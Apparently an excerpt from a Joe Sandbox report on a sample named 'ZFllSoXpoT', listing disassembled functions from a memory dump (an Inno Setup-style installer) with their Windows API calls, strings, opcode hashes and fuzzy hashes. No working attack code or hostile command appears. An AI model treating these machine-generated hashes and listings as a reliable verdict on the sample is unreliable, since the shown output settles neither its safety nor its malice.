                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                            • API String ID: 3850602802-3720027226
                                                                            • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                            • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                            • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                            • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                            • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                              • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                            • String ID: D$x^I
                                                                            • API String ID: 3798668922-903578107
                                                                            • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                            • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                            • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                            • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                            APIs
                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                            • GetFocus.USER32 ref: 00478673
                                                                            • GetKeyState.USER32(0000007A), ref: 00478685
                                                                            • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                            • String ID: Wnd=$%x
                                                                            • API String ID: 1381870634-2927251529
                                                                            • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                            • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                            • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                            • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                            APIs
                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem
                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                            • API String ID: 1748579591-1013271723
                                                                            • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                            • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                                            • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                            • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                                            APIs
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                            • String ID: DeleteFile$MoveFile
                                                                            • API String ID: 3024442154-139070271
                                                                            • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                            • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                                            • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                            • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                                            Strings
                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                                            • CSDVersion, xrefs: 0048367C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                            • API String ID: 3677997916-1910633163
                                                                            • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                            • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                            • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                            • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                            • API String ID: 47109696-2631785700
                                                                            • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                            • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                            • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                            • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                            • API String ID: 1646373207-4063490227
                                                                            • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                            • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                            • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                            • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                            • API String ID: 1646373207-260599015
                                                                            • Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                            • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                                            • Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                            • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                            • API String ID: 1646373207-597752486
                                                                            • Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                            • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                                            • Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                            • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                            • API String ID: 1646373207-834958232
                                                                            • Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                            • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                                            • Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                            • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                                            APIs
                                                                              • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                            • API String ID: 2238633743-2683653824
                                                                            • Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                            • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                                            • Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                            • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                                            APIs
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                                            • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileNext
                                                                            • String ID:
                                                                            • API String ID: 2066263336-0
                                                                            • Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                            • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                                            • Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                            • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                                            APIs
                                                                              • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                              • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                            • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CountErrorFileLastMoveTick
                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                            • API String ID: 2406187244-2685451598
                                                                            • Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                            • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                                            • Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                            • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00413D56
                                                                            • GetDesktopWindow.USER32 ref: 00413E0E
                                                                              • Part of subcall function 00418ED0: 6FDEC6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                              • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDesktopWindow$Show
                                                                            • String ID:
                                                                            • API String ID: 2074268717-0
                                                                            • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                            • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                                            • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                            • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
